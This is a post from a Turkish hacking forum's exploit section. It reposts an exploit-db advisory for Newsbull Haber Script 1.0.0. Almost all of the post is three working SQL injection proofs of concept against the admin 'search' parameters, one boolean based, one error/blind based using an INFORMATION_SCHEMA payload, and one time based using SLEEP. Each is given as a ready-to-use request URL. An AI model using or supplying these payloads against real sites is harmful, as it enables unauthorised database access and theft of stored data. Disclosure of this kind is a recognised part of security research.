ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Newsbull Haber Script - SQL Injection
Newsbull Haber Script - SQL Injection | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers
Date :
02.02.2019 13:24:08
#
Newsbull Haber Script - SQL Injection
[Full Screen Display]
#################################################################### # Exploit Title: Newsbull Haber Script - (Boolean) SQL Injection # Dork: N/A # Date: 28-01-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://newsbull.org/ # Software Link: https://github.com/gurkanuzunca/newsbull # Version: 1.0.0 # Category: Webapps # Tested on: Wampp @Win # CVE: N/A # exploit-db : https://www.exploit-db.com/exploits/46266 #################################################################### # Vulnerabilities # For the SQL injection to be applied, the user must log in. # Running the injection command in the POC section will display the db data. # The proof of the deficit is in the link below. # https://i.hizliresim.com/LlOBQz.jpg #################################################################### # POC - SQLi (Boolean Based) # Parameters : search # Attack Pattern : ’ OR 1=1 OR ’cw’=’cw # GET Request : http://localhost/newsbull/admin/menu/childs/5?search=1’[SQL] # URL : http://localhost/newsbull/admin/menu/childs/5?search=’ OR 1=1 OR ’cw’=’cw #################################################################### #################################################################### # Exploit Title: Newsbull Haber Script - SQL Injection # Dork: N/A # Date: 28-01-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://newsbull.org/ # Software Link: https://github.com/gurkanuzunca/newsbull # Version: 1.0.0 # Category: Webapps # Tested on: Wampp @Win # CVE: N/A # exploit-db : https://www.exploit-db.com/exploits/46266 #################################################################### # Vulnerabilities # For the SQL injection to be applied, the user must log in. # Running the injection command in the POC section will display the db data. # The proof of the deficit is in the link below. # https://i.hizliresim.com/LlOBQz.jpg #################################################################### # POC - SQLi (Blind) # Parameters : search # Attack Pattern : -1’ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+’ # GET Request : http://localhost/newsbull/admin/category/records?search=1’[SQL] # GET Request : http://localhost/newsbull/admin/news/records?search=1’ [SQL] # URL : http://localhost/newsbull/admin/category/records?search=-1’ and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+’ #################################################################### #################################################################### # Exploit Title: Newsbull Haber Script - SQL Injection (Time Based) # Dork: N/A # Date: 28-01-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://newsbull.org/ # Software Link: https://github.com/gurkanuzunca/newsbull # Version: 1.0.0 # Category: Webapps # Tested on: Wampp @Win # CVE: N/A # exploit-db : https://www.exploit-db.com/exploits/46266 #################################################################### # Vulnerabilities # For the SQL injection to be applied, the user must log in. # Running the injection command in the POC section will display the db data. # The proof of the deficit is in the link below. # https://i.hizliresim.com/zj0Q77.jpg #################################################################### # POC - SQLi (Time Based) # Parameters : search # Attack Pattern : -1’ or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+’ # GET Request : http://localhost/newsbull/admin/comment/records?userId=1&search=1’[SQL] # URL : http://localhost/newsbull/admin/comment/records?userId=1&search=-1’ or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+’ ####################################################################
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©